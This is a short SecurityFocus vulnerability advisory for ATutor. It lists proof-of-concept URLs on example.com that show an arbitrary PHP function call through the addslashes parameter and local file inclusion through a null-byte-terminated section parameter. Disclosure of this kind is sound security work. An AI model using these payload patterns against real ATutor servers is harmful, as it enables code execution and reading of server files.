Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

ATutor Multiple Input Validation Vulnerabilities

An exploit is not required.

The following proof of concept examples are available:

Arbitrary PHP function call:

http://www.example.com/include/html/forum.inc.php?addslashes=[function]&asc=[parameter]
http://www.example.com/include/html/forum.inc.php?addslashes=[function]&desc=[parameter]

Local file include:

http://www.example.com/documentation/common/body_header.inc.php?section=[file]%00
http://www.example.com/documentation/common/print.php?section=[file]%00







 

Privacy Statement
Copyright 2009, SecurityFocus